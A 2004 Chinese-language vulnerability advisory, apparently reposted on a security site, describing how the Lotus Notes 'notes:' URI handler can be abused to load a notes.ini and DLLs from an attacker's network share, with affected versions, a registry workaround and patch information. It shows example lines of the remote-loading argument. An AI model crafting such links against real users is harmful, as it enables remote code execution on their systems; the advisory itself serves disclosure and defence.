首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
IBM Lotus Notes URI处理器远程代码执行漏洞
来源:vfocus.net 作者:vfocus 发布时间:2004-07-01  

IBM Lotus Notes URI处理器远程代码执行漏洞

涉及程序:
IBM Lotus Notes URI

描述:
IBM Lotus Notes URI处理器远程代码执行漏洞

详细:
Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构,运行在Linux/Unix和Microsoft Windows操作系统平台下。

Lotus Notes URI处理器对输入缺少正确过滤,远程攻击者可以利用这个漏洞构建恶意链接,诱使用户访问,以进程权限在系统上执行任意命令。

在安装Lotus Notes会增加如下键值:

HKEY_CLASSES_ROOT\Notes\Shell\Open\Command

包含如下值:

C:\Program Files\lotus\notes\notes.exe %1

这可以使Lotus Notes程序notes.exe会打开"notes:"的URI请求,而配置文件notes.ini可以在命令行中指定,这个参数可以指定UNC网络共享形式的文件路径,如下面一个可以指定从远程装载配置文件:

notes.exe =\\10.0.0.1\notes\notes.ini

而notes.ini文件允许指定Notes数据目录,notes.exe程序利用此目录装载DLL文件,此参数也可以指定以UNC网络共享形式的文件路径,如:

[Notes] Directory=\\10.0.0.1\\notes

由于对来自"notes:" URI请求的传递给notes.exe参数缺少充分的字符过滤,攻击者可以诱使用户以指定的note.ini文件来启动Lotus Notes,并指定用户控制下的数据目录,当notes.exe启动时恶意程序以当前用户进程权限执行。

受影响系统:
IBM Lotus Notes 6.5
IBM Lotus Notes 6.0.1
IBM Lotus Notes 6.0
IBM Lotus Notes 5.0.12
不受影响系统:
IBM Lotus Notes 6.5.2
IBM Lotus Notes 6.0.4


攻击方法:
BUGTRAQ ID: 10600
CVE(CAN) ID: CAN-2004-0480


解决方案:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 从注册表中删除"notes:" URI的处理器注册值。

厂商补丁:

IBM
---
Domino 6.0.4和6.5.2已经修补此漏洞,建议用户联系厂商升级。

附加信息:
BUGTRAQ ID: 10600
CVE(CAN) ID: CAN-2004-0480



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Linux Kernel I2C驱动另一个整数
·Linux Kernel IEEE 1394驱动整数
·FreeBSD execve()未对齐内存访问
·WWW-SQL Include命令远程缓冲区
·3Com SuperStack Switch Web远程
·MySQL验证绕过缓冲区溢出漏洞
·Microsoft IE Shell.Application
·Easy Chat Server多个远程拒绝服
·Oracle Database 10g Installer
·PureFTPd Accept_Client远程拒绝
·Linux Kernel chown()系统调用组
·Open WebMail Email头字段HTML代
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved